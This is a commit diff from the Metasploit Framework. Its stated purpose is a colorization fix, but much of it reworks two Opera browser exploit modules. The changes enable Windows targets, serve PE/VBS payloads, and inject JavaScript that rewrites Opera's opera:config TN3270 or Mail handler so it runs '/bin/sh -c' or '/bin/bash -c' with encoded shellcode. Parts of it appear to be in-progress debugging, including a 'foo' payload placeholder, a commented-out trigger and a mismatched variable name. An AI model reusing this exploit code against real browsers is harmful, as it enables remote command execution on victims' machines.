fix a bug in colorization where %c gets replaced before %cya; wouldn't have been a problem until colorization gets put back in

git-svn-id: file:///home/svn/framework3/trunk@6960 4d416f70-5f16-0410-b530-b9f4589650da

lib/msf/core/payload/generic.rb

@@ -231,6 +231,7 @@ protected
 				raise NoCompatiblePayloadError, "Could not locate a compatible payload for #{actual_platform.names.join("/")}/#{actual_arch}"
 			else
 				dlog("Selected payload #{actual_payload.refname} from generic payload #{refname}", 'core', LEV_2)
+				print_status("Selected payload #{actual_payload.refname} from generic payload #{refname}")
 				# Share our datastore with the actual payload so that it has the
 				# appropriate values to substitute ad so on.
 				self.actual_payload.share_datastore(self.datastore)

lib/msf/ui/console/command_dispatcher/core.rb

@@ -1442,7 +1442,7 @@ class Core
 		mod.init_ui(driver.input, driver.output)
 
 		# Update the command prompt
-		driver.update_prompt("#{mod.type}(#{mod.shortname}) ")
+		driver.update_prompt("%c%cya#{mod.type}%c(%b%red#{mod.shortname}%c) ")
 	end
 	
 	#
@@ -1745,7 +1745,7 @@ protected
 
 	def show_options(mod) # :nodoc:
 		mod_opt = Serializer::ReadableText.dump_options(mod, '   ')
-		print("\nModule options:\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0)
+		print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0)
 	
 		# If it's an exploit and a payload is defined, create it and
 		# display the payload's options

lib/msf/ui/console/driver.rb

@@ -21,7 +21,7 @@ class Driver < Msf::Ui::Driver
 	ConfigCore  = "framework/core"
 	ConfigGroup = "framework/ui/console"
 
-	DefaultPrompt     = "%umsf"
+	DefaultPrompt     = "%u%whimsf%c"
 	DefaultPromptChar = ">%c"
 
 	#

lib/rex/ui/text/shell.rb

@@ -160,12 +160,12 @@ module Shell
 		# Substitute colors
 		new_prompt.gsub!(/%u/, colorize('underline'))
 		new_prompt.gsub!(/%b/, colorize('bold'))
+		new_prompt.gsub!(/%cya/, colorize('cyan'))
 		new_prompt.gsub!(/%c/, colorize('clear'))
 		new_prompt.gsub!(/%red/, colorize('red'))
 		new_prompt.gsub!(/%grn/, colorize('green'))
 		new_prompt.gsub!(/%blu/, colorize('blue'))
 		new_prompt.gsub!(/%yel/, colorize('yellow'))
-		new_prompt.gsub!(/%cya/, colorize('cyan'))
 		new_prompt.gsub!(/%whi/, colorize('white'))
 		new_prompt.gsub!(/%mag/, colorize('magenta'))
 		new_prompt.gsub!(/%blk/, colorize('black'))

modules/exploits/multi/browser/opera_configoverwrite.rb

@@ -55,12 +55,12 @@ class Metasploit3 < Msf::Exploit::Remote
 				},
 			'Targets'        =>
 				[
-					#[ 'Opera < 9.10 Windows', 
-					#	{
-					#		'Platform' => 'win',
-					#		'Arch' => ARCH_X86,
-					#	}
-					#],
+					[ 'Opera < 9.10 Windows', 
+						{
+							'Platform' => 'win',
+							'Arch' => ARCH_X86,
+						}
+					],
 					[ 'Opera < 9.10 Unix Cmd', 
 						{
 							'Platform' => 'unix',
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def on_request_uri(cli, request)
 
 		case request.uri
-		when /payload$/
+		when /payload/
 			print_status("Generating payload for #{target} #{target.platform}")
 			# Re-generate the payload
 			if ((p = regenerate_payload(cli)) == nil)
@@ -86,12 +86,10 @@ class Metasploit3 < Msf::Exploit::Remote
 				send_not_found(cli)
 				return
 			end
-			# NOTE: Change this to the new API when commiting to trunk
-			#content = Msf::Util::EXE.to_win32pe(p.encoded)
-			#content = Rex::Text.to_win32pe(p.encoded)
-			content = "foo"
+			content = Msf::Util::EXE.to_win32pe_vbs(p.encoded)
 			print_status("Generated #{content.length} bytes")
-			headers = { 'Content-Type' => 'application/octet-stream' }
+			#headers = { 'Content-Type' => 'application/octet-stream' }
+			headers = { 'Content-Type' => 'text/html' }
 		when get_resource
 			print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
 			content =  "<body><script>"
@@ -113,6 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		p = regenerate_payload(cli).encoded
 		#print_status(p)
 		shellcode = Rex::Text.to_hex(p, "%")
+		shellcode = Rex::Text.to_hex("foo", "%")
 		js = <<ENDJS
 blank_iframe = document.createElement('iframe');
 blank_iframe.src = 'about:blank';
@@ -121,25 +120,35 @@ blank_iframe.setAttribute('style', 'display:none');
 document.body.appendChild(blank_iframe);
 blank_iframe_window.eval(
 	"config_iframe = document.createElement('iframe');" +
-    "config_iframe.setAttribute('id', 'config_iframe_window');" +
-    "config_iframe.src = 'opera:config';" +
-    "document.body.appendChild(config_iframe);" +
-    "cache_iframe = document.createElement('iframe');" +
-    "cache_iframe.src = 'opera:cache';" +
-    "cache_iframe.onload = function ()" +
-    "{" +
-    "	config_iframe_window.eval" +
-    "	(\\"" +
-	"	old_handler = opera.getPreference('Network','TN3270 App');" +
-	"	shellcode = '#{shellcode}';" +
-    "	opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
-    "	app_link = document.createElement('a');" +
-    "	app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +
-    "	app_link.click();" +
-    "	setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
-    "	\\");" +
-    "};" +
-    "document.body.appendChild(cache_iframe);" +
+	"config_iframe.setAttribute('id', 'config_window');" +
+	"config_iframe.src = 'opera:config';" +
+	"document.body.appendChild(config_iframe);" +
+	"exe_iframe = document.createElement('img');" +
+	"exe_iframe.src = '#{get_resource}?payload.jpg';" +
+	"exe_iframe.onload = function () {" +
+	"	cache_iframe = document.createElement('iframe');" +
+	"	cache_iframe.src = 'opera:cache';" +
+	"	cache_iframe.onload = function ()" +
+	"	{" +
+	"		config_window.eval" +
+	"		(\\"" +
+	"		old_handler = opera.getPreference('Network','TN3270 App');" +
+	"		shellcode = '#{shellcode}';" +
+	"		opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
+	"		app_link = document.createElement('a');" +
+	"		app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +
+	//"		app_link.click();" +
+	"		setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
+	"		\\");" +
+	"	};" +
+	"	document.body.appendChild(cache_iframe);" +
+	"};" +
+	"exe_iframe.onerror = function (e) {" +
+	"	for (var i in e) {" +
+	"		alert(i);" +
+	"	}" +
+	"};" +
+	"document.body.appendChild(exe_iframe);" +
 "");
 ENDJS
 

modules/exploits/multi/browser/opera_historysearch.rb

@@ -70,12 +70,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Targets'        =>
 				[
 					#[ 'Automatic', {  } ],
-					#[ 'Opera < 9.61 Windows', 
-					#	{
-					#		'Platform' => 'win',
-					#		'Arch' => ARCH_X86,
-					#	}
-					#],
+					[ 'Opera < 9.61 Windows', 
+						{
+							'Platform' => 'win',
+							'Arch' => ARCH_X86,
+						}
+					],
 					[ 'Opera < 9.61 Unix Cmd', 
 						{
 							'Platform' => 'unix',
@@ -104,37 +104,21 @@ class Metasploit3 < Msf::Exploit::Remote
 			^
 
 		case request.uri
+		when /#{get_resource}\.exe/
+			p = regenerate_payload(cli)
+			if (p.nil?)
+				send_not_found(cli)
+				return
+			end
+			content = Msf::Util.to_win32pe(p.encoded)
+			headers['Content-Type'] = 'application/octet-stream'
 		when /[?]jspayload/
 			p = regenerate_payload(cli)
 			if (p.nil?)
 				send_not_found(cli)
 				return
 			end
-			# We're going to run this through unescape(), so make sure
-			# everything is encoded
-			penc = Rex::Text.to_hex(p.encoded, "%")
-			content = 
-				%Q{
-					var s = document.createElement("iframe");
-
-					s.src="opera:config";
-					s.id="config_window";
-					document.body.appendChild(s);
-					config_window.eval(
-						"var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
-						"old_app = opera.getPreference('Mail','External Application');" +
-						"old_handler = opera.getPreference('Mail','Handler');" +
-						"opera.setPreference('Mail','External Application',cmd);" +
-						"opera.setPreference('Mail','Handler','2');" +
-						"app_link = document.createElement('a');" +
-						"app_link.setAttribute('href', 'mailto:a@b.com');" +
-						"app_link.click();" +
-						"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
-						"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
-					"");
-					setTimeout(function () {window.location='about:blank'},1);
-				}
-
+			content = generate_cmd(target, p)
 		when /[?]history/
 			js = %Q^
 				window.onload = function() { 
@@ -152,12 +136,14 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_status("Sending #{self.name} to #{cli.peerhost} for request #{request.uri}")
 
 			js = %Q^
-				var wnd = window;
-				while (wnd.parent != wnd) {
-					wnd = wnd.parent;
+				if (window.opera) {
+					var wnd = window;
+					while (wnd.parent != wnd) {
+						wnd = wnd.parent;
+					}
+					url = location.href;
+					wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--"; 
 				}
-				url = location.href;
-				wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--"; 
 				^
 			content = %Q^
 				#{html_hdr}
@@ -171,11 +157,69 @@ class Metasploit3 < Msf::Exploit::Remote
 			send_not_found(cli)
 			return
 		end
-		content.gsub!(/^\t{4}/, '')
-		content.gsub!(/\t/, ' ')
 
 		send_response_html(cli, content, headers)
 		handler(cli)
 	end
 
+	def generate_cmd(target, payload)
+		if (target.name =~ /Windows/) 
+			config_window_js = %Q{
+				var cmd = unescape('cmd.exe /c calc.exe');
+				old_app = opera.getPreference('Mail','External Application');
+				old_handler = opera.getPreference('Mail','Handler');
+				opera.setPreference('Mail','External Application',cmd);
+				opera.setPreference('Mail','Handler','2');
+				app_link = document.createElement('a');
+				app_link.setAttribute('href', 'mailto:a@b.com');
+				app_link.click();
+				setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);
+				setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);
+			}
+			Rex::Text.compress(config_window_js)
+			toplevel_js = %Q{
+				var config_iframe = document.createElement("iframe");
+				config_iframe.src="opera:config";
+				config_iframe.id="config_window";
+				document.body.appendChild(config_iframe);
+
+				chache_iframe = document.createElement("iframe");
+				exe_iframe = document.createElement("script");
+				exe_iframe.src = "#{get_resource + ".exe"}";
+				exe_iframe.onload = function () { 
+					config_window.eval("#{config_window_js}");
+					setTimeout(function () {window.location='about:blank'},1);
+					document.body.appendChild(cache_iframe);
+				};
+				document.body.appendChild(exe_iframe);
+			}
+		elsif (target.name =~ /Unix/)
+			# We're going to run this through unescape(), so make sure
+			# everything is encoded, not just chars that are special to html,
+			# ala encode_uri().
+			penc = Rex::Text.to_hex(payload.encoded, "%")
+			content = %Q{
+				var s = document.createElement("iframe");
+
+				s.src="opera:config";
+				s.id="config_window";
+				document.body.appendChild(s);
+				config_window.eval(
+					"var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
+					"old_app = opera.getPreference('Mail','External Application');" +
+					"old_handler = opera.getPreference('Mail','Handler');" +
+					"opera.setPreference('Mail','External Application',cmd);" +
+					"opera.setPreference('Mail','Handler','2');" +
+					"app_link = document.createElement('a');" +
+					"app_link.setAttribute('href', 'mailto:a@b.com');" +
+					"app_link.click();" +
+					"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
+					"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
+				"");
+				setTimeout(function () {window.location='about:blank'},1);
+			}
+		return content
+		end
+	end
+
 end